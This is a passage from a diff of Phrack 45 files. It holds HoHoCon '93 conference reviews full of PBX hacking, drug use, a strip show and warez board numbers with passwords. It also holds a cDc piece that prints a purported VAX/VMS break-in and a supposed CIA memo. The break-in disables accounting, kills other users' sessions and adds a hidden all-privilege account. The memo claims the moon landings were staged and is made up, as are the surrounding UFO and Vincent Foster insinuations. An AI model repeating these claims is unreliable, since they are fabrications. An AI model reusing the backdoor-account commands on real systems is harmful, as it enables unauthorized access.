+  dad is not selling WOMEN'S SHOES. "
+
+                                    - Guess Who
+
+I arrived at the con one day too early, before anyone else
+had showed up, and started striving through the
+neighborhood. Well, this looked like fun. The Hilton and the
+Super-8 were, along with a mall and a South Western Bell
+building with light-at-night, wide open, overflowing
+dumpsters situated between highways, a couple miles outside
+of town. Cool. Used to Europe, where there is more public
+transportation than cars on the street, I was kinda stuck in
+there, so I spent my time chatting with the front desk clerk
+of the motel ("Monty? Ahh, ya mean Monty from the hotel
+security? Well, don't spread the word, he has a penis
+problem.."). Everybody was able to confirm this a day
+later during on a police raid, but let's save that for
+later. So stuck between a WAL-MART ("SHOTGUNS! ON SALE! JUST
+$99"), a movie theater and a cheap mall I spent this day
+sipping complimentary tea at the front desk and watching
+Wayne's World 2. ("A Unix Book. Cool.")
+
+On the next day, all kinds of people started to flow in, and
+I spent my time following around various people since I came
+to the con alone, not seeing one familiar face around. I
+bumped into Minor Threat and his trusty friend Mucho plus
+a bunch of other guys trying to fix something with ToneLoc.
+Walking around a little more, I ran into some dudes that
+were busy hacking into the hotel's PBX using its 1200-bps
+line.. Walking over to the Hilton, I found a tone in a wall
+jack and called home. Still talking, hunger overcame me and
+I decided to go to the mall and grab munchies. Walking past
+the Hilton's pool, a kid was trying to fish his scanner out
+of the water. Remember: A PRO-43 does NOT stay afloat! Later
+that night, the whole place was pretty crowded already. It
+was unreal. The lobby was crowded by at least two dozen
+scanner-wielding kids, trying to find the frequency for the
+hotel security. The guards must have been felt pretty
+strange - each time they talked, something like five people
+with frequency counters walked past them. Finally, the word
+spread (466.025/825) and each time some guard started
+talking, it was echoing back over everyone's scanner in a
+two-mile range around the party place. I soon left the 3L3eT pIt
+and hung out with AKA to play some stupid games ("Oh, there
+is a calling card on the floor." "Where??" "You can't see it,
+its eleet!") when we saw red and blue lights in front of the
+Super-8 Motel. Three cop-cars had arrived, and they busted
+an about 14-years old kid for scanning local numbers from
+his motel room. While everybody stood around in front of the
+room where they hold (or ABUSED) the kid, people were
+thinking if this would be legal, arresting and squeezing
+this kid with no lawyer and no parents around, they sped past
+us with their victim, and someone told the kid that it was his
+constitutional right to remain silent until he would get a
+lawyer or at least a parent. And guess: The cops pulled the
+guy out and told him that he should not stand around and
+advise people about their constitutional rights. Quote:
+" This is the manager, this is a police officer, I am the
+security guard. LEAVE! " - "And I will NOT leave." Good
+thing that someone was videotaping the whole thing. So much
+action, and the con hadn't even started. Tired of so eViL
+K-r0cKinG rAcIsM I stumbled to my room and fell asleep on
+some standup comedy on TV. Tomorrow was the con!
+
+The next morning around 9, I found the food court in the
+mall crowded. It seemed like everybody on the con was going
+to eat the last time for his life, or at least the last
+time before the 6-hour Con-A-Thon started. Walking around in
+the empty conference room, some hotel employee asked me
+"HoHoCon? Is this like a Santa Claus meeting or something?"
+Maybe it was just cause I wore a santa-hat. When Drunkfux
+finally started the meeting one hour late I found myself
+squashed in between some system administrator and another
+guy from some three-letter-agency that typed everything that
+was said into his laptop at something like 2.000.000
+characters a second. Scared shitless, I was listening to the
+events, still a little drowsy from very little sleep the
+last night - I only remember Cap'n Crunch talking about
+boxing in Russia (something that interested me, at least),
+and the LOD members talking about some data preservation
+project - if you are interested what in detail was talked
+about, I'm sure Drunkfux will sell you the videotape for a
+couple hundred $. In a break, he was selling merchandise,
+and I think he didn't look more happy during the whole con
+than in the moment everybody was waving with twenty-dollar
+bills.. Phat pockets was also what the LOD guys were looking
+for.. (just in case you don't know: They are collecting old
+message boards and sell the printout for something like $35).
+
+After this sellout session, I found a sign on the wall:
+"hoho.con.com --->", and, in room 260 someone piled up an
+enormous mass of equipment, including something like 4 UNIX
+machines, a SLIP connection, 20" screens, PET's.. Plus, the
+room was stacked with 30-40 people, and I mean STACKED. Most
+people were wasting their time entering commands like
+"mget /warez/eleet/hot/0-day/*.*" Sick of that, I grabbed a
+bunch of people and we went trashing at SW-Bell around the
+block, and whoops! we found a diagram like this:
+
+
+     (Europe)             (Asia)           (Australia)
+
+                      ______
+                 ____|      |____
+                |                |
+                |   Texas   o <====== Austin
+                 \             /
+                  \           /
+                   \_________/
+
+      (North America)           (South America)
+
+Now we know it: South Western Bell believes that Austin, Texas,
+is the center of the world. Well, from the 17th to the 19th of
+December, 1993, it was.
+
+                TEN THINGS I LEARNED AT HOHOCON '93
+
+ 1. Social-Engineering the front-desk clerk PAYS!
+ 2. If you drink 20 cups of complimentary tea, they WILL hassle you.
+ 3. If the guard hears his voice over your scanner, he WILL hassle you.
+ 4. If you sign on as CLIFF STOLL and pay cash, they WONT hassle you.
+ 5. Don't scan from a hotel room. But feel free to hack the PBX.
+ 6. Pizza Hut accepts all major credit cards.
+ 7. Austin, Texas, is the center of the universe.
+ 8. Some people really want room service in a Super-8 Motel.
+ 9. A radio shack is not lighter than water nor water-proof.
+10. Barney is a purple penis.
+
+Shouts to Tr8or and SevenUp: Why didn't you join me?
+Write to onkeld@ponton.hanse.de for further discussion....
+
+------------------------------------------------------------------------------
+
+Conference Behavior - a Study of the Lame and the Damned
+
+by Holistic Hacker/R2
+
+[This little file was inspired by a talk Phantom Phreaker and I had at
+HoHoCon last year, after some of the stupid shit that went on at it and
+SummerCon.  The rough draft was written on my laptop on the flight back
+from Austin.]
+
+It seems some little kids are having problems figuring out how to act
+at the various hacker cons around the country.  Hacking has nothing to do
+with how many smoke bombs you can drop in the hotel or how many fire
+extinguishers you steal.  If you lamers think that being away from mommy
+for the first time in your life means that you can trash a hotel, then do
+it.  By all means make it a local one first, so Mom and Dad can bail your
+sorry ass out of jail.
+
+I get really tired of going to a con and some little punk wants to play
+eleet anarchist and then the cops show.  Cons are a chance to learn and/or
+share info, see people, and have a good time.  Shit like what has happened
+this last year just isn't needed.  All that comes out of stupid actions is
+a bad rap on the "underground."  Some friends and I were in the hotel bar
+Saturday night and the bartender was telling us how the hotel people were
+really getting tired of the lame shit.
+
+I was in one room Saturday night, swapping files and talking when the
+smoke alarm went off at 3 AM or so.  I bet whoever did it got a real kick
+seeing all of the people up, and he probably creamed his jeans when the
+fire truck showed up.  Emergency personnel don't need to waste their time
+on wannabe anarchist weenies, it isn't their job.
+
+Another brilliant soul decided to set off one of the fire extinguishers
+in the Super 8.  I saw other jerks trying to wake up the people on the top
+two floors of the Hilton at 2 in the morning.  I saw another guy carrying two
+extinguishers off, and he didn't look like hotel staff.  Another genius
+tried cutting a hole in the vending machine with a glass cutter.  Just
+because it isn't your property means you can trash it.  The fucked-up
+elevator control panels, the damaged exit signs, etc. are costs the hotel
+passes on to the customers and to us.  Even worse, when the word gets
+out, the hotels don't want the cons back.  Why would they want to rent us
+rooms, if they are just gonna get trashed?  If this is how you want cons
+to be, then hold your own.
+
+------------------------------------------------------------------------------
+
+     All typos are intentional.  The following summary of HohoCon 93
+     is based solely upon my perceptions and are subject to the laws of
+     physics.  Take these comments as you see them.
+
+     By Frosty
+
+First off, there was a $5 charge at the door.  This also entitled you to
+partake in the raffle offered of lame-to-cool objects.  $100 would rig the
+raffle in your favor.  One person walked away with a full //e system, and
+another with a 486 system.
+
+The Conference ---
+------------------
+
+Bruce Sterling - A humorous talk that thrashed virii.  Informed us of the #1
+                 anti-virii person in Russia, Dimitri.  Generously gave away
+                 several copies of "The Hacker Crackdown" on disk.
+                 Famous quote, "Information wants to be free."
+
+Ray Kaplan - A humorous security consultant.  Wants to establish a site for
+             security holes to be available.  Had a brief Q&A session.  Wants
+             interaction between the security consultants and hackers.  Also
+             stressed protecting information and privacy.
+
+Douglas Barnes - Representatives from CypherPunks.  Works in cryptography.
+Jim              Famous quote, "I want to talk to my lawyer."  Another
+                 quote, "Hackers are requested to call between 9 and 5."
+                 There are several Fidonet sites not allowing encrypted
+                 messages to go through.  The liability decreases with a
+                 site allowing encrypted messages.  ViaCrypt PGP is the
+                 legal version of PGP.  Another quote, "A triple DES file
+                 is as good as unbreakable."  Pushed the book "Applied
+                 Cryptography."  Working on a digital Credit Union.
+                 System Administrators are not responsible for passing
+                 codes.  Quote, "The net perceives censorship and routes
+                 around it."
+
+Grayareas - Made a magazine plug.  Looking for information for the 'zine.
+
+Damien Thorn - Works on the 'zine "Nuts and Bolts."  Talked about cellular
+               tracking and hacking.  Informed that a cell hacking program
+               can be obtained from mkl@nw.com.
+
+Captain Crunch - Talked on the San Francisco raves and how they utilized
+aka John Draper  networking and encryption to get their rave information out.
+                 Gave history and information on hacking Soviet phones and
+                 the KGB lines.
+
+Simmion - Attendee from Moscow.  Stated there was no evidence of virii being
+          highly prolific in Russia.  Almost all software is free in Russia.
+          Most conferences in Russia are done by BBS's.  Russians can not
+          afford the high software prices legally.
+
+LOD/Comm - Project information on their Digital Archive project.
+           Also, presented a cash donation to the SotMESC to help fund
+           a scholarship campaign for those involved in the hacking realm.
+
+Erik Bloodaxe - Conversed about wireless modems and Email networks.
+
+The Omega
+White Knight - gave out copies of a government document on UFO coverups.
+
+Count Zero - Members of the cDc/RDT.  Handed out fliers and gave a packet
+Kingpin      radio demonstration.  Informed they would be coming out with
+             the 'Jolly-Roger Dialer' for $80 approx. that would be better
+             than the 'Demon-Dialer' offered by Hack-Tic.
+
+Brian Oblivion - Conversed about legalities and the Clipper Chip.
+                 Informed us that the EFF is not promoting help on court
+                 cases ( they're too big ).  Quoted, "The Internet is the
+                 collective consciousness of the community."  Quoted
+                 Compuserve that, "The Internet is sewage."
+
+
+Errata
+------
+
+The Unix at the Super 8 Hotel was hacked.
+Room 293 at the Super 8 was raided the day prior to the conference starting.
+A LAN was set up in 260 at the Super 8 ( Thanks Georgia Tech ).
+Kudos to Annaliza / Torquie for filming the conference for her documentary.
+Kudos to 'Vibe' for giving away free shirts to the public.
+DO NOT leave anything expensive out, it will be stolen !!!
+Kudos to Malicious and his group for being the friendliest hacks.
+Kudos to Grayarea, who will be providing her coverage of the Con.
+The Techno-Porn party the SotMESC sponsored went well through the night.
+Many thanks to the mall-girls that showed up to lend themselves to the masses.
+Cold Pricklies to whoever set the fire alarms off Saturday night.
+A big question mark to whoever acquired the large 30' inflatable balloon.
+Warez Boards -> 214-642-0003 NUP: flying man
+                214-642-1940 / 264-6269 NUP: london run
+                817-551-5404 NUP: none
+
+THE CHEAP-SEX AWARD
+-------------------
+     The personnel in room 508 at the Hilton that provided strippers,
+     but enforced a door-charge and sex-charge for services.
+
+THE MOST OBNOXIOUS PERSON AT HOHOCON 1993 AWARD
+-----------------------------------------------
+     The AT&T person who took pictures of EVERYONE
+     in the line going into the conference center.
+
+     A Gif of this individual will be provided later =:)
+
+          This is just a 'Spur of the Moment' release.
+          We look forward to view-points from other sources.
+
+------------------------------------------------------------------------------
+
+HoHoCon '93 - Out With A Bang                                January, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Winn Schwartau (Page 8) (Security Insider Report)
+
+The hackers did it again.  A monster party, several hundred strong, where
+hacking was the agenda.  HoHoCon is the annual hacker's convention in Texas,
+where all hell breaks loose.  December 17-19 in Austin was the host of this
+last one.
+
+According to the hackers, it was a great party; the ethernet lines were run
+between rooms; the net was connected, and everyone consumed mass quantities
+of their favorite legal substance or controlled substance.  One hacker was
+busted, apparently, for breaking into the hotel's PBX system and dialing the
+Planet Krypton (or some such place) and the cops sat outside the front door
+just in case.  In case of what?  According to the hotel, in case of crazy
+kids getting too crazy.
+
+This last HoHoCon was the biggest yet; estimates from 250-500 people attending
+to learn about hacking; keep tabs on the hackers; or hack themselves into
+position of respect amongst their peers.  One attendee took roll after roll
+of photos of hackers; some hackers got paranoid, others laughed at him hiding
+behind pillars and jumping out to snap a pix.  Whatever.
+
+On the other hand, some security professionals who attended were absolutely
+aghast at what they saw; wild kids, with no reins, breaking into computers
+over the net is not fun nor legal.  The drug and alcohol consumption was
+too extreme, and the messages and conference sessions somewhat disorganized.
+But, nonetheless, not one person I spoke to said they wouldn't attend again
+next year.  So there must be something to it.  Even legendary phreaks like
+John Draper aka Captain Crunch were there, despite his tenuous hold on
+reality and emanating odor.
+
+This was the minority, though, and most security pros said they picked up a
+few tricks here and there.  HoHoCon next year, the organizers fear, will
+turn legit if too many 'suits' come so they have to promote the event better.
+Next year's HoHoCon won't be held until January of 1995, making attendance
+easier for those who have Holiday conflicts.
+
+We'll keep you informed.
+
+------------------------------------------------------------------------------
+
+HoHo Con '93
+by Erik Bloodaxe
+
+It was the eve of HoHoCon 93 and I found myself caught in a serious
+dilemma.  I had promised to provide this year's "entertainment" yet
+I knew I was going to back out of it.  I had received about a million
+emails and chat messages bugging me about the "bondage show" that was
+supposed to transpire that Saturday night and had tried my hardest to
+give them little or no commentary, knowing full well that I was going to
+flake out at the last moment.
+
+So here I was, driving towards the Austin Airport Hilton, trying to come
+up with excuses about why there would be no show to some 300 hormonal
+sociopaths.  Every scenario seemed bleak:  "Phrack Editor Vivisected!"
+"Hacker Revolt Leaves Three Dead, 15 Wounded."  I tried to blow it off,
+consoling myself that no one would really give a shit, and that it was
+only my own ego that demanded that I fulfill the promise of sleeze.
+
+Upon arrival at the Hilton, I was amused to find some 30 or more
+miscreants milling about the lobby, amusing themselves with house phones
+and sordid tales of last week's hack.  As usual, there was not a
+payphone to be had, a direct result of the numerous Radio Shack dialers
+on hand (model 43-141).
+
+I mingled somewhat distantly, looking for Chasin, Tcon, Lex, Drunkfux or
+anyone else I needed to talk to.  Of course they weren't there.  I was
+beginning to wonder how in the hell I could pass the time when I was
+paged by Lex.
+
+Lex Luthor was staying a safe distance from the main fracas.  In typical
+Luthorian paranoia, he was determined to not have his name on anything,
+such as car rental or hotel room, so by staying just far enough away he
+hoped to not have his name on any arrest reports either.  Lex, Professor
+Falken, Al Capone, Mark Tabas, The Mentor and I were all supposed to
+have dinner that evening.  After getting Lex's room information, I took
+off to get Mentor.
+
+Getting everyone together was somewhat of a clusterfuck.  Tabas was
+located at the bottom of a 151 bottle, but surfaced in time to grab
+dinner.
+
+During dinner at Baby Acapulco's, as the award-winning waitstaff lost
+most of our orders, Mentor reminisced about some of my more unbalanced
+teenage moments such as:  the time I cut the break cables on a Mercedes
+because its owner had made the moves on my evening's female target, the
+knife and gun wielding passout on the railroad tracks, etc.  He ended
+with, "You sure have changed.  I'm surprised you aren't dead."
+
+I suddenly felt old.  It would not be the last time I felt that way that
+weekend.
+
+After dinner I decided to be a jerk and lash out at Tabas for insulting
+my overinflated ego on the net.  It accomplished nothing, except to further
+distance ourselves but this evil voice in my head deemed it necessary.
+We agreed to disagree and to try to put aside our numerous past
+problems for the interim, although I doubt either of us believed
+in the resolution.
+
+Once back at the Hilton, things were beginning to heat up.  Some hundred
+or more conferees were loitering back and forth from the Hilton to the
+Super 8 next door.  I finally managed to hook up with Chasin, Tcon, Koresh
+and Louis Cypher in their room at the Super 8.  Lcypher was enjoying what
+would probably be his last taste of freedom, since he was due to ship out
+to federal boot camp the next month.
+
+Sometime thereafter, a score of people began running upstairs with
+computer equipment, laughing to themselves.  As would be typical, a short
+time later several police cruisers showed up.  The kids had broken into
+a phone closet and ran extra lines to their room to either:   a) run a bbs,
+b) wardial the city or hotel, or c) prove once and for all they were the
+dumbest people in attendance.  A member of the Austin EFF chapter ran
+about screaming about the rights of the accused.  The police told him
+that if he didn't shut up he would be going downtown as well.  The
+silence came instantly.
+
+The appearance of police so soon on the first evening made several
+people quite nervous, especially those guests with rather large pupils,
+whose numbers were growing in abundance.  They sat in their rooms with
+the lights dimmed (or off) peering out the curtains wondering if the cops
+would be knocking on their doors next.
+
+Word reached us that KevinTX had shown up.  In typical flair, Kev had
+blown in straight from Las Vegas where he had just won some $20,000
+playing Blackjack, and was in a very festive mood.  Once we reached his
+floor, we were greeted with the sounds of a dozen tropical birds in
+terrible agony.  Obviously "the tank" had been filled, and was being
+rapidly drained.
+
+Inside the room black plastic bags lined the floor giving the
+appearance of a recent trashing run, but in reality were the
+victims of an unforgiving blast of n2o.  Some Andrew Blake film played
+on the VCR Kevin and his crew had brought, and a new camcorder was being
+erected to capture the planned debauchery on tape.
+
+We asked Kevin how on earth they managed to wheel in a 20 lb tank of
+nitrous through the lobby and up to the room without being questioned.
+Kevin said they put it under a jacket and just walked right through.  I
+wondered how long it would be before everyone else began wheeling in
+kegs.
+
+I begged everyone not to put the bags over their heads, as resuscitating
+any potential asphyxiation victim was not in my agenda.  (Quick flashback
+to a blue-faced man spasming from oxygen depravation, "No really officer,
+I don't know why he put that bag on his head and went to sleep.")
+Besides, it would be too far to drag a dead body down to the dumpster
+from the hotel room without attracting suspicion.
+
+The tank was drained and the crowd dwindled.
+
+Reflecting upon the altered states of those wandering almost zombie-like
+around the hotels, I decided that if anyone were to be raiding the con
+it should be the DEA rather than the FBI.
+
+I arrived at the con the next morning lugging a box full of my t-shirts,
+ready to make the rent.  In the conference room Bruce Sterling was in the
+middle of an incredible rant about the evils of Virii.  I don't know what
+the hell he was talking about.  I'm not quite sure if anyone did, but
+I got the impression that he got zapped.  A note to the kiddies:  don't
+copy that floppy!
+
+At the door, dFx was busily commandeering the five dollar "voluntary
+contribution."  I asked him how the take was and he whipped out a stack
+of money that would choke an elephant.  I asked him for my share
+for being his marketing and advertising rep.  The money and dFx disappeared.
+
+Damien Thorn of Nuts & Volts, whose column is the ONLY reason I subscribe,
+took the stand and talked about the magazine and his column.  I
+jumped up and asked him about his involvement with Phoenix Rising
+Communications, and suggested they not use the name "The Phoenix
+Project" as their BBS name.  Damien seemed somewhat apologetic when
+he said that he didn't realize that it had already been used in the past.
+(Obviously Sterling's book didn't get read by everyone.)
+
+I took off to find out where the casualties from last night were hiding.
+After a lengthy and fruitless search for Chasin, Tcon or KevinTX, I stumbled
+back into the con area just in time to find out that LOD Communications would
+be hitting the podium next.
+
+As we all wandered up front, (we being me, Lex, Tabas, Phantom Phreaker,
+Professor Falken and Al Capone), an explosion of camera flashes shook the
+conference room.  It was the most ridiculous thing I have ever been a
+witness to.  I felt pretty sorry for Lex, who had managed to avoid
+being photographed as "Lex Luthor" for his entire life, now being the
+target of every butthead with a Nikon in the greater Austin area.
+
+After we rambled about the BBS archive project, I got the chance
+to give one of the worst presentations of my life.  I will credit
+some of this to the lack of display technology (mainly overhead projector
+and VGA adaptor) but the main fault was my own.  I spoke for a bit about
+wireless wide area networking via commercial packet radio and about
+services such as RadioMail.
+
+Afterwards, Chasin and I introduced White Knight and The Omega who,
+in typical cDc fashion, relayed the further adventures of "America's
+Favorite Hacker:  Quentin."  At the end of their speech, they offered
+about a dozen copies of Quentin's latest exposure of a government cover-up.
+
+The madcap dash of reporters, hackers and various other would-be
+co-conspirators to grab the sacred printout was like the closing scene
+of "It's a Mad Mad World."  The stage rush was not terribly unlike
+my first Metallica concert:  people diving over chairs, crawling over
+heads, screaming, arms flailing.  The only difference were the
+reporters yelling "Press!  Press!  I must have a copy!"
+
+The conference wrapped up with attorney Steve Ryan talking about the
+sorry state of computer law.
+
+Bernie Milligan of Communications & Toll Fraud Specialists from Houston
+finally ran out of film.  (Bernie, if you recall, was at HoHo '92
+sitting at the back of the room with the Super Ear.  I wonder how much
+he gets for the photos.  Maybe he just tacks them up on his wall
+and has little fantasy conversations with them as he spanks his monkey.
+I don't know.)
+
+After the speaking was concluded, Weevil wandered over and asked me when
+the bondage show would be going on.  I told him that it would not
+be happening.  Weevil, still very elated over his rave reviews in
+"Dazed and Confused," looked at me and in a stereotypical Hollywood-esque
+display of confidence said, "Don't worry about it dude.  I'll take care of it."
+
+A 17 year old actor and would-be pimp.  Yeah, right.
+
+I got shanghaied by John Littman who was working on his book about Kevin
+Poulsen, Agent Steal and friends.  We talked for a bit, and I came to
+the following conclusions:
+
+5 REASONS WHY I AM LIKE AGENT STEAL
+
+1.  We both shared a knack for dating strippers.
+2.  We are both long haired, skinny, aging hackers.
+3.  We both know the value of a carefully placed camcorder.
+4.  We both have been the subject of investigations by the government.
+5.  We both have assisted the government.
+
+5 REASONS WHY I AM NOT LIKE AGENT STEAL
+
+1.  I have both my original legs.
+2.  I only use Saran Wrap for leftovers.
+3.  I would never dress like any member of Poison.
+4.  I stopped breaking into buildings when I was 14.
+5.  I would never turn in my friends to save my own ass.
+
+That evening as everyone was getting antsy, Frosty popped up with
+his "Techno-Porn."  Something like 24 hours of non-stop pornography
+compressed into 6 hours.  You'd have to see it to understand.
+
+Everyone seemed to migrate towards 508, most likely a direct result
+of the internal sex & drug divining rods built into the subconscious of
+every attendee.  Sometime around 9 or 10 in the evening, Weevil
+showed up parading five very attractive, scantily clad young women.
+The strippers made their way through the lobby of the Hilton evoking
+a Pied Piper effect, dragging hundreds of drooling hackers in their
+wake.
+
+They managed to get into the hotel room unscathed.  Outside the room
+the crowds gathered, anxious to get a peek at the girlies.
+
+The girls, meanwhile, got somewhat agitated, looking around at their
+predicament.  They had given up their Saturday night shift at Sugar's
+Cabaret (an Austin upscale nudie bar) for the prospect of making some
+easy cash at HoHoCon.  Apparently Weevil exaggerated a bit about the
+quality of the attendees in his fervor to coax them back to the hotel.
+
+I, being a take charge kind of guy, asked the girls what they needed,
+took some orders, and announced to the crowd that anyone who did not have
+at least forty dollars needed to get the fuck out.  Once word of the
+necessity of money spread among the riot-like crowds swarming the 5th floor,
+they became like Donn Parker's hair and thinned quickly and ultimately
+disappeared entirely.
+
+Zar took over the job of guarding the door and making sure that no one got in
+without showing that they had cash for the girls, and KevinTX rounded up cash
+from within the room and manned the camcorder and radio.  After a few beers,
+everyone loosened up and the show began.
+
+Soon, there were topless women everywhere.  There were "table-dances"
+happening on the toilet, there were women on the beds, and grinding away
+on the floor in front of a mirror.
+
+It was the kind of thing that I'm sure Dr. Mitch Kabay would be shocked
+and dismayed by, but unfortunately he wasn't in the room.  Perhaps
+he didn't have the cash to get in.
+
+Everyone in the room was having a blast.  Consultants, reporters, and hackers
+all equally sharing in the debauchery.  Zar gave new meaning to the word
+"man-handling."  I can only thank God that I had sold all my shirts,
+so I had cash to spare.
+
+The night went on, the beer flowed, the dopamine inhibitors kicked
+in full force, and the money changed hands faster than could be counted.
+By the end of the evening, everyone had received several "table dances,"
+KevinTX had whip marks on his back, Weevil had won my complete admiration,
+and the girls made a small fortune.  Each of the dancers walked away with
+over $200 in cash.  The biggest winner was a really hot little 18 year-old
+named Cathy who raked in almost $400.
+
+As the night drew to a close, the room emptied, the girls gathered up
+their outfits and made for home, or paired up to go somewhere else.
+
+I awoke Sunday somewhere else.  No comment.  (I couldn't anyway, since I
+have no recollection.)
+
+So ended HoHoCon.
+
+---------------------------------------------------------------------------
+
+Additional HoHoCon Reviews:
+
+HoHoCon Review                                                 Spring 1994
+~~~~~~~~~~~~~~
+By Netta Gilboa (Gray Areas) (Page 30)
+
+Rising From the Underground                                    March, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Damien Thorn (Nuts & Volts) (Page 100)
+
+------------------------------------------------------------------------------
+
+(Vibe Magazine & Aasahi Computing to have articles soon)
diff --git a/phrack45/12.txt b/phrack45/12.txt
new file mode 100644
index 0000000..b64f2eb
--- /dev/null
+++ b/phrack45/12.txt
@@ -0,0 +1,761 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 12 of 28
+
+****************************************************************************
+
+                            "Quentin Strikes Again"
+
+     In the Fall of 1992, "NBC: Dateline" aired a show on computer hackers,
+interviewing Erik Bloodaxe, Doc Holiday and a person named "Quentin."  Half-
+way through the show, Quentin is shown with his back to the camera, text
+scrolling across his screen.  Dateline seemed oblivious: on closer inspection,
+Quentin was displaying a file which listed various MIL and GOV sites which
+allegedly had "autopsies of extra-terrestrials on record", information about
+UFO crash sites, detailed governmental research on alien beings.
+     By December, that Dateline episode had created quite a stir within the
+hacker community.  Who was Quentin?  What file was he displaying?  Was this an
+elaborate hoax, a joke which failed to gain the attention of NBC?  At HoHoCon
+'92 in Houston, Bloodaxe and Holiday explained that the file did exist and the
+information it contained was in fact true.  Lending some credence to the
+story, well-placed sources indicated that the White House had requested a copy
+of the episode from NBC.
+     Bloodaxe and Holiday refused to name the people involved, but explained
+that a relatively unknown group had formed to pursue a project they referred
+to variously as "Project ALF" and "Project Green Cheese", searching government
+computers for any evidence which might verify a UFO cover-up.  Apparently they
+struck pay dirt.
+     By the Summer of 1993, at least one member of Project Green Cheese had
+"disappeared."  White House aide Vincent Foster turned up dead after an
+apparent suicide; among documents found in Foster's office possibly linking
+President Clinton to a failed Arkansas Savings & Loan, a videotape was also
+found: the Dateline episode on Hackers.
+
+     Apparently buoyed by their success, the Green Cheese group began scanning
+an unpublished prefix in the 202 NPA toward the end of the Summer.  They were
+surprised to learn that nearly every number in that prefix was answered by the
+same authoritative voice asking, "Who is this?"  Not to be discouraged, the
+group continued until they happened upon a lone DEC Server.
+     There they uncovered documentation suggesting a covert action of a
+different kind: a cover-up instigated by the three-letter agencies and NASA,
+perpetrated upon the public with the unwitting aid of the media in the early
+1970s, beginning with the death of three astronauts.
+     What follows is an excerpt of their discovery.
+
+
+--                 The Omega                 White Knight
+                   cDc / RDT                  cDc / RDT
+
+
+
+
+
+
+ DDDDD     OOOO    CCCC            VV         VV   AA    XX    XX
+ DD  DD   OO  OO  CC  CC            VV       VV   AAAA    XX  XX
+ DD   DD  OO  OO  CC                 VV     VV   AA  AA    XXXX
+ DD   DD  OO  OO  CC        ----      VV   VV    AA  AA     XX
+ DD   DD  OO  OO  CC        ----       VV VV     AAAAAA    XXXX
+ DD  DD   OO  OO  CC  CC                VVV      AA  AA   XX  XX
+ DDDDD     OOOO    CCCC                  V       AA  AA  XX    XX
+
+
+
+DEFENSE ADVANCED RESEARCH PROJECTS AGENCY
+DOCUMENT REPOSITORY
+
+
+                           W  A  R  N  I  N  G:
+
+This computer system is operated by the United States Government and is
+protected under provisions of USC Title 23, Section 67.  Unauthorized access
+is STRICTLY FORBIDDEN.
+
+
+ENTRANCE:
+USERNAME: FIELD
+PASSWORD:
+
+$ SET ACCOUNTING/DISABLE
+
+$ SET LOGINS/INTERACTIVE=0
+
+$ SHOW USERS
+
+VAX/VMS INTERACTIVE USERS
+23-JUL-1993 09:37:15.54
+Total number of interactive users= 6
+Username      Process Name  PID       Terminal
+BRUNO         BRUNO         0000026B  TTD3:
+FIELD*        FIELD         00000FF2  TTC2:
+JOHNSON       _TTD5:        0000026D  TTD5:
+LINCOLN       LINCOLN       0000026A  TTD2:
+SMITH         SMITH         000001D8  TTD4:
+
+$ SET PROCESS/PRIVS=ALL
+
+$ STOP/ID=26B
+
+$ STOP/ID=26D
+
+$ STOP/ID=26A
+
+$ STOP/ID=1D8
+
+$ SET DEF SYS$SYSROOT:[SYSEXE]
+
+$ RUN AUTHORIZE
+
+UAF> ADD BOVINE /PASSWORD=CULTEE /UIC=[099,900] /CPUTIME=0-
+/DEVICE=SYS$SYSROOT /DIRECTORY=[SYSEXE] /PRIVS=ALL /NOACCOUNTING
+
+UAF> EXIT
+
+$ DIR *.*
+
+[DEATH_STAR]     [ECDYSIAST]     [IPSUM]     [KIMOTA]
+[LOREM]          [MAGIC]         [PPYRUS]    [TOC]
+^Y
+
+$ SET DEFAULT <PPYRUS>
+
+$ TYPE *.MAI;1
+
+
+
+                                                          DL 433-54-3937
+                                                                10/28/71
+
+
+                     Central Intelligence Agency
+                         Internal Memorandum
+
+                            PPYRUS SECTION
+
+
+
+This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
+electronic form outside of your section.
+
+
+TO:   Thomas J. Kelley, Director, PPYRUS Section
+
+FROM: Bill Brown, PP Deputy Chief
+
+SUBJ: Preliminary Briefing #1
+      Special Projects, PPYRUS
+
+
+     Pursuant to reg. 3-2638-A, it is my responsibility as Deputy Chief, this
+section, to inform and apprise the incoming Director of all special projects
+planned or currently underway, as well as incidental or related projects.
+     PPYRUS projects, this Administration, include:
+
+      Project            Inception
+      -------            ---------
+
+      MAGIC                5/69
+      SKY-HOOK             7/69
+      ARAGON              11/69
+      ANTIGONE             1/70
+      KILO                 9/70
+      ORACLE               4/71
+      DPULTRA              8/71
+
+      PPYRUS related projects, this Administration, include:
+
+      Project            Inception
+      -------            ---------
+
+      UMENSCH              2/63
+      CAPRICORN            7/68
+
+
+     Of these projects, DPULTRA (and two related projects, UMENSCH and
+CAPRICORN) require your immediate attention and approval.
+
+
+                                  (1)
+
+This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
+electronic form outside of your section.
+
+[CONTINUE] ^M
+
+
+
+
+                                                          DL 433-54-3937
+                                                                10/28/71
+
+
+                     Central Intelligence Agency
+                         Internal Memorandum
+
+                            PPYRUS SECTION
+
+
+
+This memorandum is VIOLET and SENSITIVE; Do not circulate in paper or
+electronic form outside of your section.
+
+
+BACKGROUND, PROJECT CAPRICORN
+----------  ------- ---------
+
+     By 1965, NASA's public relations machine was in high gear, advertising
+amazing (and non-existant) advances in American space technology and setting
+an ambitious schedule for the Space Agency's top priority: a manned space
+flight to the moon by the end of the decade.
+     Despite the few successes NASA and the Air Force had had with rocketry,
+in a memo to the President, dated 11/13/67, NASA reluctantly expressed some
+doubt that a moon mission could be accomplished even by 1973.  The President
+made it clear that the moon mission was, by now, more of a political mission
+than one of science, and its success was of the utmost national priority.
+World sentiment at the time favored the Russians, their flawless successes a
+seeming vindication of the power and motivation of the Communist system.
+Further, the President felt that a success could deflect attention from the
+Vietnam war and re-invigorate public sentiment in the United States toward the
+nation, the Administration, and the ingenuity of American technology.
+     As a contingency for failure, CAPRICORN was instigated, its final
+approval to be decided by the middle of the following year in a meeting
+between the President, DIRNASA, DIRCIA, DIRNSA and attendant adjutants.  The
+President summed CAPRICORN up in these words, "If we can't be heroes, we can
+damn well act like heroes!"
+     CAPRICORN's mission was a relatively simple one: covert deception of the
+public and media, under the guidance of PSYOPS and PPYRUS; a manned moon
+mission would be simulated and pre-recorded in a controlled environment, later
+to be broadcast "live."
